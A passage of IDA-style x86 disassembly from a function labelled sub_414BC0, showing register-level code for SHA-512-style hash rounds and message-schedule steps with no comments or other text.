mov ebx, eax
shrd ebx, ebp, 0Eh
xor edi, edi
or edi, ebx
xor edx, edi
shr ebp, 0Eh
mov ecx, eax
shl ecx, 12h
or ecx, ebp
mov ebp, [esp+170h+var_130]
xor esi, ecx
mov ecx, [esp+170h+var_134]
and ebp, eax
mov edi, eax
mov eax, [esp+170h+var_12C]
and eax, ecx
mov ebx, ecx
mov ecx, [esp+170h+var_11C]
not ebx
and ebx, [esp+170h+var_124]
not edi
and edi, [esp+170h+var_128]
xor ebx, eax
mov eax, [esp+170h+var_15C]
xor edi, ebp
add edx, edi
adc esi, ebx
add edx, ds:dword_41FA38[eax*8]
adc esi, ds:dword_41FA3C[eax*8]
add edx, [esp+170h+var_80]
mov eax, [esp+170h+var_120]
adc esi, [esp+170h+var_7C]
add eax, edx
adc ecx, esi
add [esp+170h+var_140], eax
mov [esp+170h+var_11C], ecx
mov [esp+170h+var_120], eax
adc [esp+170h+var_13C], ecx
mov ecx, [esp+170h+var_158]
mov eax, [esp+170h+var_154]
mov edx, ecx
mov ebx, eax
shrd edx, ebx, 1Ch
mov esi, ecx
mov ebp, eax
shld ebp, ecx, 1Eh
xor edi, edi
or edi, edx
shr ebx, 1Ch
shl esi, 4
or esi, ebx
mov edx, eax
shr edx, 2
shl ecx, 1Eh
xor ebx, ebx
or edx, ecx
or ebx, ebp
xor edi, edx
xor esi, ebx
mov ebx, [esp+170h+var_158]
xor edx, edx
mov ebp, eax
shld ebp, ebx, 19h
or edx, ebp
mov ebp, [esp+170h+var_14C]
shl ebx, 19h
xor esi, edx
mov edx, [esp+170h+var_150]
mov ecx, eax
shr ecx, 7
or ecx, ebx
xor edi, ecx
mov ecx, [esp+170h+var_158]
mov ebx, edx
xor ebx, ecx
and ebx, [esp+170h+var_148]
and edx, ecx
mov ecx, [esp+170h+var_14C]
xor ebp, eax
and ebp, [esp+170h+var_144]
and ecx, eax
xor ebx, edx
xor ebp, ecx
add edi, ebx
adc esi, ebp
add [esp+170h+var_120], edi
adc [esp+170h+var_11C], esi
cmp [esp+170h+var_15C], 0
jz loc_4162D1
mov eax, [esp+170h+var_E8]
mov ecx, [esp+170h+var_E4]
mov ebx, ecx
mov edi, eax
shrd edi, ebx, 8
mov ebp, eax
shrd ebp, ecx, 1
xor esi, esi
or esi, edi
shr ecx, 1
mov edi, eax
mov edx, eax
shr ebx, 8
shl edi, 1Fh
or edi, ecx
mov ecx, [esp+170h+var_E4]
shrd eax, ecx, 7
shl edx, 18h
or edx, ebx
xor ebx, ebx
or ebx, ebp
xor esi, ebx
xor esi, eax
mov eax, [esp+170h+var_118]
xor edx, edi
shr ecx, 7
xor edx, ecx
mov ecx, [esp+170h+var_114]
mov ebx, eax
mov ebp, ecx
shrd ebx, ebp, 13h
xor edi, edi
or edi, ebx
mov ebx, ecx
mov [esp+170h+var_160], esi
mov esi, eax
shld ecx, eax, 3
add eax, eax
add eax, eax
shl esi, 0Dh
shr ebp, 13h
or esi, ebp
add eax, eax
shr ebx, 1Dh
or ebx, eax
mov eax, [esp+170h+var_118]
xor ebp, ebp
or ebp, ecx
mov ecx, [esp+170h+var_114]
shrd eax, ecx, 6
shr ecx, 6
xor esi, ebp
xor edi, ebx
xor esi, ecx
mov ecx, [esp+170h+var_160]
xor edi, eax
mov eax, [esp+170h+arg_0]
add ecx, edi
adc edx, esi
add ecx, [esp+170h+var_108]
adc edx, [esp+170h+var_104]
add ecx, [esp+170h+var_F0]
adc edx, [esp+170h+var_EC]
mov [eax+98h], ecx
mov [eax+9Ch], edx
mov eax, edx
mov [esp+170h+var_F0], ecx
mov [esp+170h+var_EC], eax
mov [esp+170h+var_78], ecx
jmp short loc_4162E6
; ---------------------------------------------------------------------------
loc_4162D1: ; CODE XREF: sub_414BC0+1626j
mov edx, [esp+170h+var_F0]
mov eax, [esp+170h+var_EC]
mov [esp+170h+var_78], edx
loc_4162E6: ; CODE XREF: sub_414BC0+170Fj
mov ecx, [esp+170h+var_13C]
mov ebx, ecx
mov [esp+170h+var_74], eax
mov eax, [esp+170h+var_140]
mov edx, ecx
xor esi, esi
shr edx, 9
mov edi, eax
shld ebx, edi, 17h
or esi, ebx
shl edi, 17h
or edx, edi
xor ebx, ebx
mov ebp, eax
shrd ebp, ecx, 12h
or ebx, ebp
mov ebp, [esp+170h+var_13C]
xor edx, ebx
shr ecx, 12h
mov edi, eax
shl edi, 0Eh
or edi, ecx
xor esi, edi
xor edi, edi
mov ebx, eax
shrd ebx, ebp, 0Eh
or edi, ebx
xor edx, edi
shr ebp, 0Eh
mov ecx, eax
shl ecx, 12h
or ecx, ebp
xor esi, ecx
mov ecx, [esp+170h+var_13C]
mov ebx, ecx
and ecx, [esp+170h+var_134]
mov edi, eax
and eax, [esp+170h+var_138]
not ebx
and ebx, [esp+170h+var_12C]
not edi
and edi, [esp+170h+var_130]
xor ebx, ecx
mov ecx, [esp+170h+var_124]
xor edi, eax
mov eax, [esp+170h+var_15C]
add edx, edi
adc esi, ebx
add edx, ds:dword_41FA40[eax*8]
adc esi, ds:dword_41FA44[eax*8]
add edx, [esp+170h+var_78]
mov eax, [esp+170h+var_128]
adc esi, [esp+170h+var_74]
add eax, edx
adc ecx, esi
add [esp+170h+var_148], eax
mov [esp+170h+var_124], ecx
mov [esp+170h+var_128], eax
adc [esp+170h+var_144], ecx
mov eax, [esp+170h+var_11C]
mov ecx, [esp+170h+var_120]
mov edx, ecx
mov ebx, eax
shrd edx, ebx, 1Ch
mov esi, ecx
xor edi, edi
or edi, edx
mov ebp, eax
shld ebp, ecx, 1Eh
shr ebx, 1Ch
shl esi, 4
or esi, ebx
mov edx, eax
shl ecx, 1Eh
shr edx, 2
xor ebx, ebx
or edx, ecx
or ebx, ebp
xor edi, edx
xor esi, ebx
mov ecx, eax
mov ebx, [esp+170h+var_120]
xor edx, edx
mov ebp, eax
shld ebp, ebx, 19h
or edx, ebp
mov ebp, [esp+170h+var_154]
shl ebx, 19h
shr ecx, 7
or ecx, ebx
xor esi, edx
mov edx, [esp+170h+var_158]
xor edi, ecx
mov ecx, [esp+170h+var_120]
mov ebx, edx
xor ebx, ecx
and ebx, [esp+170h+var_150]
and edx, ecx
mov ecx, [esp+170h+var_154]
xor ebp, eax
and ebp, [esp+170h+var_14C]
and ecx, eax
xor ebx, edx
xor ebp, ecx
add edi, ebx
adc esi, ebp
add [esp+170h+var_128], edi
adc [esp+170h+var_124], esi
cmp [esp+170h+var_15C], 0
jz loc_416519
mov eax, [esp+170h+var_C8]
mov ecx, [esp+170h+var_C4]
mov ebx, ecx
mov edi, eax
shrd edi, ebx, 13h
xor esi, esi
or esi, edi
mov edi, ecx
shr ebx, 13h
mov edx, eax
mov ebp, eax
shld ecx, ebp, 3
shl edx, 0Dh
or edx, ebx
xor ebx, ebx
or ebx, ecx
mov ecx, [esp+170h+var_C4]
shrd eax, ecx, 6
add ebp, ebp
add ebp, ebp
add ebp, ebp
shr edi, 1Dh
or edi, ebp
xor esi, edi
xor esi, eax
mov eax, [esp+170h+var_F8]
xor edx, ebx
shr ecx, 6
xor edx, ecx
mov ecx, [esp+170h+var_F4]
mov ebp, ecx
mov ebx, eax
shrd ebx, ebp, 8
xor edi, edi
or edi, ebx
mov [esp+170h+var_160], esi
mov esi, eax
mov ebx, eax
shrd eax, ecx, 1
shl esi, 18h
shr ebp, 8
or esi, ebp
shr ecx, 1
xor ebp, ebp
or ebp, eax
mov eax, [esp+170h+var_F8]
shl ebx, 1Fh
or ebx, ecx
mov ecx, [esp+170h+var_F4]
shrd eax, ecx, 7
shr ecx, 7
xor esi, ebx
xor edi, ebp
xor esi, ecx
mov ecx, [esp+170h+var_160]
xor edi, eax
mov eax, [esp+170h+arg_0]
add ecx, edi
adc edx, esi
add ecx, [esp+170h+var_B8]
adc edx, [esp+170h+var_B4]
add ecx, [esp+170h+var_E8]
adc edx, [esp+170h+var_E4]
mov [eax+0A0h], ecx
mov [eax+0A4h], edx
mov eax, edx
mov [esp+170h+var_E8], ecx
mov [esp+170h+var_E4], eax
mov [esp+170h+var_68], ecx
jmp short loc_41652E
; ---------------------------------------------------------------------------
loc_416519: ; CODE XREF: sub_414BC0+1868j
mov edx, [esp+170h+var_E8]
mov eax, [esp+170h+var_E4]
mov [esp+170h+var_68], edx
loc_41652E: ; CODE XREF: sub_414BC0+1957j
mov ecx, [esp+170h+var_144]
mov ebx, ecx
mov [esp+170h+var_64], eax
mov eax, [esp+170h+var_148]
mov edx, ecx
xor esi, esi
shr edx, 9
mov edi, eax
shld ebx, edi, 17h
or esi, ebx
shl edi, 17h
or edx, edi
xor ebx, ebx
mov ebp, eax
shrd ebp, ecx, 12h
or ebx, ebp
mov ebp, [esp+170h+var_144]
xor edx, ebx
shr ecx, 12h
mov edi, eax
shl edi, 0Eh
or edi, ecx
xor esi, edi
xor edi, edi
mov ebx, eax
shrd ebx, ebp, 0Eh
or edi, ebx
xor edx, edi
shr ebp, 0Eh
mov ecx, eax
shl ecx, 12h
or ecx, ebp
xor esi, ecx
mov ecx, [esp+170h+var_144]
mov ebx, ecx
and ecx, [esp+170h+var_13C]
mov edi, eax
and eax, [esp+170h+var_140]
not ebx
and ebx, [esp+170h+var_134]
not edi
and edi, [esp+170h+var_138]
xor ebx, ecx
mov ecx, [esp+170h+var_12C]
xor edi, eax
mov eax, [esp+170h+var_15C]
add edx, edi
adc esi, ebx
add edx, ds:dword_41FA48[eax*8]
adc esi, ds:dword_41FA4C[eax*8]
add edx, [esp+170h+var_68]
mov eax, [esp+170h+var_130]
adc esi, [esp+170h+var_64]
add eax, edx
adc ecx, esi
add [esp+170h+var_150], eax
mov [esp+170h+var_12C], ecx
mov [esp+170h+var_130], eax
adc [esp+170h+var_14C], ecx
mov eax, [esp+170h+var_124]
mov ecx, [esp+170h+var_128]
mov edx, ecx
mov ebx, eax
shrd edx, ebx, 1Ch
mov esi, ecx
xor edi, edi
or edi, edx
mov ebp, eax
shld ebp, ecx, 1Eh
shr ebx, 1Ch
shl esi, 4
or esi, ebx
mov edx, eax
shl ecx, 1Eh
shr edx, 2
xor ebx, ebx
or edx, ecx
or ebx, ebp
xor edi, edx
xor esi, ebx
mov ecx, eax
mov ebx, [esp+170h+var_128]
xor edx, edx
mov ebp, eax
shld ebp, ebx, 19h
or edx, ebp
mov ebp, [esp+170h+var_11C]
shl ebx, 19h
shr ecx, 7
or ecx, ebx
xor esi, edx
mov edx, [esp+170h+var_120]
xor edi, ecx
mov ecx, [esp+170h+var_128]
mov ebx, edx
xor ebx, ecx
and ebx, [esp+170h+var_158]
and edx, ecx
mov ecx, [esp+170h+var_11C]
xor ebp, eax
and ebp, [esp+170h+var_154]
and ecx, eax
xor ebx, edx
xor ebp, ecx
add edi, ebx
adc esi, ebp
add [esp+170h+var_130], edi
adc [esp+170h+var_12C], esi
cmp [esp+170h+var_15C], 0
jz loc_416761
mov eax, [esp+170h+var_B0]
mov ecx, [esp+170h+var_AC]
mov ebx, ecx
mov edi, eax
shrd edi, ebx, 8
mov ebp, eax
shrd ebp, ecx, 1
xor esi, esi
or esi, edi
shr ecx, 1
mov edi, eax
mov edx, eax
shr ebx, 8
shl edi, 1Fh
or edi, ecx
mov ecx, [esp+170h+var_AC]
shrd eax, ecx, 7
shl edx, 18h
or edx, ebx
xor ebx, ebx
or ebx, ebp
xor esi, ebx
xor esi, eax
mov eax, [esp+170h+var_F0]
xor edx, edi
shr ecx, 7
xor edx, ecx
mov ecx, [esp+170h+var_EC]
mov ebx, eax
mov ebp, ecx
shrd ebx, ebp, 13h
xor edi, edi
or edi, ebx
mov ebx, ecx
mov [esp+170h+var_160], esi
mov esi, eax
shld ecx, eax, 3
add eax, eax
add eax, eax
shl esi, 0Dh
shr ebp, 13h
or esi, ebp
add eax, eax
shr ebx, 1Dh
or ebx, eax
mov eax, [esp+170h+var_F0]
xor ebp, ebp
or ebp, ecx
mov ecx, [esp+170h+var_EC]
shrd eax, ecx, 6
shr ecx, 6
xor esi, ebp
xor edi, ebx
xor esi, ecx
mov ecx, [esp+170h+var_160]
xor edi, eax
mov eax, [esp+170h+arg_0]
add ecx, edi
adc edx, esi
add ecx, [esp+170h+var_A8]
adc edx, [esp+170h+var_A4]
add ecx, [esp+170h+var_F8]
adc edx, [esp+170h+var_F4]
mov [eax+0A8h], ecx
mov [eax+0ACh], edx
mov eax, edx
mov [esp+170h+var_F8], ecx
mov [esp+170h+var_F4], eax
mov [esp+170h+var_50], ecx
jmp short loc_416770
; ---------------------------------------------------------------------------
loc_416761: ; CODE XREF: sub_414BC0+1AB0j
mov edx, [esp+170h+var_F8]
mov eax, [esp+170h+var_F4]
mov [esp+170h+var_50], edx
loc_416770: ; CODE XREF: sub_414BC0+1B9Fj
mov ecx, [esp+170h+var_14C]
mov ebx, ecx
mov [esp+170h+var_4C], eax
mov eax, [esp+170h+var_150]
xor esi, esi
mov edx, ecx
mov edi, eax
shld ebx, edi, 17h
or esi, ebx
shl edi, 17h
xor ebx, ebx
shr edx, 9
or edx, edi
mov ebp, eax
shrd ebp, ecx, 12h
or ebx, ebp
mov ebp, [esp+170h+var_14C]
xor edx, ebx
shr ecx, 12h
mov edi, eax
shl edi, 0Eh
or edi, ecx
xor esi, edi
mov ebx, eax
shrd ebx, ebp, 0Eh
xor edi, edi
or edi, ebx
xor edx, edi
shr ebp, 0Eh
mov ecx, eax
shl ecx, 12h
or ecx, ebp
mov ebp, [esp+170h+var_148]
xor esi, ecx
mov ecx, [esp+170h+var_14C]
and ebp, eax
mov edi, eax
mov eax, [esp+170h+var_144]
and eax, ecx
mov ebx, ecx
mov ecx, [esp+170h+var_134]
not ebx
and ebx, [esp+170h+var_13C]
not edi
and edi, [esp+170h+var_140]
xor ebx, eax
mov eax, [esp+170h+var_15C]
xor edi, ebp
add edx, edi
adc esi, ebx
add edx, ds:dword_41FA50[eax*8]
adc esi, ds:dword_41FA54[eax*8]
add edx, [esp+170h+var_50]
mov eax, [esp+170h+var_138]
adc esi, [esp+170h+var_4C]
add eax, edx
adc ecx, esi
add [esp+170h+var_158], eax
mov [esp+170h+var_134], ecx
mov [esp+170h+var_138], eax
adc [esp+170h+var_154], ecx
mov ecx, [esp+170h+var_130]
mov eax, [esp+170h+var_12C]
mov edx, ecx
mov ebx, eax
shrd edx, ebx, 1Ch
mov esi, ecx
mov ebp, eax
shld ebp, ecx, 1Eh
xor edi, edi
or edi, edx
shr ebx, 1Ch
shl esi, 4
or esi, ebx
mov edx, eax
shr edx, 2
shl ecx, 1Eh
xor ebx, ebx
or edx, ecx
or ebx, ebp
xor edi, edx
xor esi, ebx
mov ebx, [esp+170h+var_130]
xor edx, edx
mov ebp, eax
shld ebp, ebx, 19h
or edx, ebp
mov ebp, [esp+170h+var_124]
shl ebx, 19h
xor esi, edx
mov edx, [esp+170h+var_128]
mov ecx, eax
shr ecx, 7
or ecx, ebx
xor edi, ecx
mov ecx, [esp+170h+var_130]
mov ebx, edx
xor ebx, ecx
and ebx, [esp+170h+var_120]
and edx, ecx
mov ecx, [esp+170h+var_124]
xor ebp, eax
and ebp, [esp+170h+var_11C]
and ecx, eax
xor ebx, edx
xor ebp, ecx
add edi, ebx
adc esi, ebp
add [esp+170h+var_138], edi
adc [esp+170h+var_134], esi
cmp [esp+170h+var_15C], 0
jz loc_4169B3
mov eax, [esp+170h+var_C0]
mov ecx, [esp+170h+var_BC]
mov ebx, ecx
mov edi, eax
shrd edi, ebx, 8
mov ebp, eax
shrd ebp, ecx, 1
xor esi, esi
or esi, edi
shr ecx, 1
mov edi, eax
mov edx, eax
shr ebx, 8
shl edi, 1Fh
or edi, ecx
mov ecx, [esp+170h+var_BC]
shrd eax, ecx, 7
shl edx, 18h
or edx, ebx
xor ebx, ebx
or ebx, ebp
xor esi, ebx
xor esi, eax
mov eax, [esp+170h+var_E8]
xor edx, edi
shr ecx, 7
xor edx, ecx
mov ecx, [esp+170h+var_E4]
mov ebx, eax
mov ebp, ecx
shrd ebx, ebp, 13h
xor edi, edi
or edi, ebx
mov ebx, ecx
mov [esp+170h+var_160], esi
mov esi, eax
shld ecx, eax, 3
add eax, eax
add eax, eax
shl esi, 0Dh
shr ebp, 13h
or esi, ebp
add eax, eax
shr ebx, 1Dh
or ebx, eax
mov eax, [esp+170h+var_E8]
xor ebp, ebp
or ebp, ecx
mov ecx, [esp+170h+var_E4]
shrd eax, ecx, 6
shr ecx, 6
xor esi, ebp
xor edi, ebx
xor esi, ecx
mov ecx, [esp+170h+var_160]
xor edi, eax
mov eax, [esp+170h+arg_0]
add ecx, edi
adc edx, esi
add ecx, [esp+170h+var_D0]
adc edx, [esp+170h+var_CC]
add ecx, [esp+170h+var_B0]
adc edx, [esp+170h+var_AC]
mov [eax+0B0h], ecx
mov [eax+0B4h], edx
mov eax, edx
mov [esp+170h+var_B0], ecx
mov [esp+170h+var_AC], eax
mov [esp+170h+var_40], ecx
jmp short loc_4169C8
; ---------------------------------------------------------------------------
loc_4169B3: ; CODE XREF: sub_414BC0+1CF6j
mov edx, [esp+170h+var_B0]
mov eax, [esp+170h+var_AC]
mov [esp+170h+var_40], edx
loc_4169C8: ; CODE XREF: sub_414BC0+1DF1j
mov ecx, [esp+170h+var_154]
mov [esp+170h+var_3C], eax
mov eax, [esp+170h+var_158]
mov ebx, ecx
xor esi, esi
mov edi, eax
shld ebx, edi, 17h
or esi, ebx
shl edi, 17h
mov edx, ecx
shr edx, 9
or edx, edi
mov ebp, eax
shrd ebp, ecx, 12h
xor ebx, ebx
or ebx, ebp
mov ebp, [esp+170h+var_154]
xor edx, ebx
shr ecx, 12h
mov edi, eax
shl edi, 0Eh
or edi, ecx
xor esi, edi
mov ebx, eax
shrd ebx, ebp, 0Eh
xor edi, edi
or edi, ebx
xor edx, edi
mov ecx, eax
shl ecx, 12h
shr ebp, 0Eh
or ecx, ebp
mov ebp, [esp+170h+var_150]
xor esi, ecx
mov ecx, [esp+170h+var_154]
and ebp, eax
mov edi, eax
mov eax, [esp+170h+var_14C]
and eax, ecx
mov ebx, ecx
mov ecx, [esp+170h+var_13C]
not edi
and edi, [esp+170h+var_148]
not ebx
and ebx, [esp+170h+var_144]
xor edi, ebp
xor ebx, eax
mov eax, [esp+170h+var_15C]
add edx, edi
adc esi, ebx
add edx, ds:dword_41FA58[eax*8]
mov edi, [esp+170h+var_12C]
adc esi, ds:dword_41FA5C[eax*8]
add edx, [esp+170h+var_40]
mov eax, [esp+170h+var_140]
adc esi, [esp+170h+var_3C]
add eax, edx
adc ecx, esi
add [esp+170h+var_120], eax
mov esi, [esp+170h+var_130]
mov [esp+170h+var_140], eax
adc [esp+170h+var_11C], ecx
mov [esp+170h+var_13C], ecx
mov ecx, [esp+170h+var_138]
mov eax, esi
xor eax, ecx
mov [esp+170h+var_98], eax
mov eax, [esp+170h+var_134]
mov edx, edi
xor edx, eax
mov [esp+170h+var_94], edx
mov edx, esi
and edx, ecx
mov [esp+170h+var_90], edx
mov edx, edi
and edx, eax
mov [esp+170h+var_8C], edx
mov edx, ecx
xor esi, esi
shl edx, 4
mov edi, ecx
mov ebx, eax
shrd edi, ebx, 1Ch
shr ebx, 1Ch
or edx, ebx
or esi, edi
mov ebp, eax
shld ebp, ecx, 1Eh
xor ebx, ebx
shl ecx, 1Eh
or ebx, ebp
mov edi, eax
xor edx, ebx
mov ebx, [esp+170h+var_138]
shr edi, 2
or edi, ecx
mov ecx, eax
shld eax, ebx, 19h
xor esi, edi
shr ecx, 7
xor edi, edi
or edi, eax
mov eax, [esp+170h+var_98]
and eax, [esp+170h+var_128]
shl ebx, 19h
xor eax, [esp+170h+var_90]
or ecx, ebx
xor esi, ecx
mov ecx, [esp+170h+var_94]
and ecx, [esp+170h+var_124]
xor edx, edi
xor ecx, [esp+170h+var_8C]
add esi, eax
adc edx, ecx
add [esp+170h+var_140], esi
adc [esp+170h+var_13C], edx
cmp [esp+170h+var_15C], 0
jz loc_416C2F
mov eax, [esp+170h+var_A0]
mov ecx, [esp+170h+var_9C]
mov ebx, ecx
mov edi, eax
shrd edi, ebx, 8
mov ebp, eax
shrd ebp, ecx, 1
xor esi, esi
or esi, edi
shr ecx, 1
mov edi, eax
mov edx, eax
shr ebx, 8
shl edi, 1Fh
or edi, ecx
mov ecx, [esp+170h+var_9C]
shrd eax, ecx, 7
shl edx, 18h
or edx, ebx
xor ebx, ebx
or ebx, ebp
xor esi, ebx
xor esi, eax
mov eax, [esp+170h+var_F8]
xor edx, edi
shr ecx, 7
xor edx, ecx
mov ecx, [esp+170h+var_F4]
mov ebx, eax
mov ebp, ecx
shrd ebx, ebp, 13h
xor edi, edi
or edi, ebx
mov ebx, ecx
mov [esp+170h+var_160], esi
mov esi, eax
shld ecx, eax, 3
add eax, eax
add eax, eax
shl esi, 0Dh
shr ebp, 13h
or esi, ebp
add eax, eax
shr ebx, 1Dh
or ebx, eax
mov eax, [esp+170h+var_F8]
xor ebp, ebp
or ebp, ecx
mov ecx, [esp+170h+var_F4]
shrd eax, ecx, 6
shr ecx, 6
xor esi, ebp
xor edi, ebx
xor esi, ecx
mov ecx, [esp+170h+var_160]
xor edi, eax
mov eax, [esp+170h+arg_0]
add ecx, edi
adc edx, esi
add ecx, [esp+170h+var_D8]
adc edx, [esp+170h+var_D4]
add ecx, [esp+170h+var_C0]
adc edx, [esp+170h+var_BC]
mov [eax+0B8h], ecx
mov [eax+0BCh], edx
mov eax, edx
mov [esp+170h+var_C0], ecx
mov [esp+170h+var_BC], eax
mov [esp+170h+var_30], ecx
jmp short loc_416C44
; ---------------------------------------------------------------------------
loc_416C2F: ; CODE XREF: sub_414BC0+1F7Ej
mov edx, [esp+170h+var_C0]
mov eax, [esp+170h+var_BC]
mov [esp+170h+var_30], edx
loc_416C44: ; CODE XREF: sub_414BC0+206Dj
mov ecx, [esp+170h+var_11C]
mov ebx, ecx
mov [esp+170h+var_2C], eax
mov eax, [esp+170h+var_120]
xor esi, esi
mov edx, ecx
mov edi, eax
shld ebx, edi, 17h
or esi, ebx
shl edi, 17h
xor ebx, ebx
shr edx, 9
or edx, edi
mov ebp, eax
shrd ebp, ecx, 12h
or ebx, ebp
mov ebp, [esp+170h+var_11C]
xor edx, ebx
shr ecx, 12h
mov edi, eax
shl edi, 0Eh
or edi, ecx
xor esi, edi
mov ebx, eax
shrd ebx, ebp, 0Eh
shr ebp, 0Eh
xor edi, edi
or edi, ebx
xor edx, edi
mov ecx, eax
shl ecx, 12h
or ecx, ebp
mov ebp, [esp+170h+var_158]
xor esi, ecx
mov ecx, [esp+170h+var_11C]
and ebp, eax
mov edi, eax
mov eax, [esp+170h+var_154]
and eax, ecx
mov ebx, ecx
mov ecx, [esp+170h+var_148]
not ebx
and ebx, [esp+170h+var_14C]
not edi
and edi, [esp+170h+var_150]
xor ebx, eax
mov eax, [esp+170h+var_15C]
xor edi, ebp
add edx, edi
adc esi, ebx
add edx, ds:dword_41FA60[eax*8]
adc esi, ds:dword_41FA64[eax*8]
add edx, [esp+170h+var_30]
mov eax, [esp+170h+var_128]
adc esi, [esp+170h+var_2C]
add ecx, edx
mov edx, [esp+170h+var_144]
adc edx, esi
add eax, ecx
adc [esp+170h+var_124], edx
mov [esp+170h+var_148], ecx
mov ecx, [esp+170h+var_140]
mov [esp+170h+var_144], edx
mov edx, [esp+170h+var_13C]
mov ebx, ecx
mov ebp, edx
shrd ebx, ebp, 1Ch
xor edi, edi
or edi, ebx
mov esi, ecx
mov ebx, edx
shld edx, ecx, 1Eh
shr ebp, 1Ch
shl esi, 4
or esi, ebp
shr ebx, 2
shl ecx, 1Eh
xor ebp, ebp
or ebx, ecx
mov [esp+170h+var_128], eax
or ebp, edx
mov ecx, [esp+170h+var_13C]
xor esi, ebp
mov ebp, [esp+170h+var_140]
mov edx, ecx
shld ecx, ebp, 19h
xor edi, ebx
shr edx, 7
xor ebx, ebx
or ebx, ecx
mov ecx, [esp+170h+var_98]
and ecx, [esp+170h+var_140]
shl ebp, 19h
xor ecx, [esp+170h+var_90]
or edx, ebp
xor edi, edx
mov edx, [esp+170h+var_94]
and edx, [esp+170h+var_13C]
xor esi, ebx
xor edx, [esp+170h+var_8C]
add edi, ecx
adc esi, edx
add [esp+170h+var_148], edi
adc [esp+170h+var_144], esi
cmp [esp+170h+var_15C], 0
jz loc_416E90
mov eax, [esp+170h+var_B0]
mov ecx, [esp+170h+var_AC]
mov ebx, ecx
mov edi, eax
shrd edi, ebx, 13h
xor esi, esi
or esi, edi
mov edi, ecx
shr ebx, 13h
mov edx, eax
mov ebp, eax
shld ecx, ebp, 3
shl edx, 0Dh
or edx, ebx
xor ebx, ebx
or ebx, ecx
mov ecx, [esp+170h+var_AC]
shrd eax, ecx, 6
add ebp, ebp
add ebp, ebp
add ebp, ebp
shr edi, 1Dh
or edi, ebp
xor esi, edi
xor esi, eax
mov eax, [esp+170h+var_E0]
xor edx, ebx
shr ecx, 6
xor edx, ecx
mov ecx, [esp+170h+var_DC]
mov ebp, ecx
mov ebx, eax
shrd ebx, ebp, 8
xor edi, edi
or edi, ebx
mov [esp+170h+var_160], esi
mov esi, eax
mov ebx, eax
shrd eax, ecx, 1
shl esi, 18h
shr ebp, 8
or esi, ebp
shr ecx, 1
xor ebp, ebp
or ebp, eax
mov eax, [esp+170h+var_E0]
shl ebx, 1Fh
or ebx, ecx
mov ecx, [esp+170h+var_DC]
shrd eax, ecx, 7
shr ecx, 7
xor esi, ebx
xor edi, ebp
xor edi, eax
mov eax, [esp+170h+arg_0]
xor esi, ecx
mov ecx, [esp+170h+var_160]
add ecx, edi
adc edx, esi
add ecx, [esp+170h+var_118]
adc edx, [esp+170h+var_114]
add ecx, [esp+170h+var_A0]
adc edx, [esp+170h+var_9C]
mov [eax+0C0h], ecx
mov [eax+0C4h], edx
mov eax, edx
mov [esp+170h+var_9C], eax
mov [esp+170h+var_1C], eax
mov eax, [esp+170h+var_128]
mov [esp+170h+var_A0], ecx
mov [esp+170h+var_20], ecx
jmp short loc_416EAC
; ---------------------------------------------------------------------------
loc_416E90: ; CODE XREF: sub_414BC0+21CEj
mov edx, [esp+170h+var_A0]
mov ecx, [esp+170h+var_9C]
mov [esp+170h+var_20], edx
mov [esp+170h+var_1C], ecx
loc_416EAC: ; CODE XREF: sub_414BC0+22CEj
mov ecx, [esp+170h+var_124]
mov ebx, ecx
xor esi, esi
mov edx, ecx
mov edi, eax
shld ebx, edi, 17h
or esi, ebx
shl edi, 17h
xor ebx, ebx
shr edx, 9
or edx, edi
mov ebp, eax
shrd ebp, ecx, 12h
or ebx, ebp
mov ebp, [esp+170h+var_124]
xor edx, ebx
shr ecx, 12h
mov edi, eax
shl edi, 0Eh
or edi, ecx
xor esi, edi
mov ebx, eax
shrd ebx, ebp, 0Eh
xor edi, edi
or edi, ebx
xor edx, edi
shr ebp, 0Eh
mov ecx, eax
shl ecx, 12h
or ecx, ebp
mov ebp, [esp+170h+var_120]
xor esi, ecx
mov ecx, [esp+170h+var_124]
and ebp, eax
mov edi, eax
mov eax, [esp+170h+var_11C]
and eax, ecx
mov ebx, ecx
mov ecx, [esp+170h+var_14C]
not ebx
and ebx, [esp+170h+var_154]
not edi
and edi, [esp+170h+var_158]
xor ebx, eax
mov eax, [esp+170h+var_15C]
xor edi, ebp
add edx, edi
adc esi, ebx
add edx, ds:dword_41FA68[eax*8]
adc esi, ds:dword_41FA6C[eax*8]
add edx, [esp+170h+var_20]
mov eax, [esp+170h+var_150]
adc esi, [esp+170h+var_1C]
add eax, edx
adc ecx, esi
add [esp+170h+var_130], eax
mov [esp+170h+var_14C], ecx
mov [esp+170h+var_150], eax
adc [esp+170h+var_12C], ecx
mov eax, [esp+170h+var_144]
mov ecx, [esp+170h+var_148]
mov edx, ecx
mov ebx, eax
shrd edx, ebx, 1Ch
mov esi, ecx
xor edi, edi
or edi, edx
mov ebp, eax
shld ebp, ecx, 1Eh
shr ebx, 1Ch
shl esi, 4
or esi, ebx
mov edx, eax
shl ecx, 1Eh
shr edx, 2
xor ebx, ebx
or edx, ecx
or ebx, ebp
xor edi, edx
xor esi, ebx
mov ecx, eax
mov ebx, [esp+170h+var_148]
mov ebp, eax
shld ebp, ebx, 19h
xor edx, edx
or edx, ebp
mov ebp, [esp+170h+var_13C]
xor ebp, [esp+170h+var_134]
shl ebx, 19h
shr ecx, 7
or ecx, ebx
xor esi, edx
mov edx, [esp+170h+var_140]
xor edi, ecx
mov ecx, [esp+170h+var_138]
and ebp, eax
mov eax, [esp+170h+var_13C]
and eax, [esp+170h+var_134]
mov ebx, edx
xor ebx, ecx
and ebx, [esp+170h+var_148]
and edx, ecx
xor ebx, edx
xor ebp, eax
add edi, ebx
adc esi, ebp
add [esp+170h+var_150], edi
adc [esp+170h+var_14C], esi
cmp [esp+170h+var_15C], 0
jz loc_4170DA
mov eax, [esp+170h+var_C0]
mov ecx, [esp+170h+var_BC]
mov ebx, ecx
mov edi, eax
shrd edi, ebx, 13h
xor esi, esi
or esi, edi
mov edi, ecx
shr ebx, 13h
mov edx, eax
mov ebp, eax
shld ecx, ebp, 3
shl edx, 0Dh
or edx, ebx
xor ebx, ebx
or ebx, ecx
mov ecx, [esp+170h+var_BC]
shrd eax, ecx, 6
add ebp, ebp
add ebp, ebp
add ebp, ebp
shr edi, 1Dh
or edi, ebp
xor esi, edi
xor esi, eax
mov eax, [esp+170h+var_100]
xor edx, ebx
shr ecx, 6
xor edx, ecx
mov ecx, [esp+170h+var_FC]
mov ebp, ecx
mov ebx, eax
shrd ebx, ebp, 8
xor edi, edi
or edi, ebx
mov [esp+170h+var_160], esi
mov esi, eax
mov ebx, eax
shrd eax, ecx, 1
shl esi, 18h
shr ebp, 8
or esi, ebp
shr ecx, 1
xor ebp, ebp
or ebp, eax
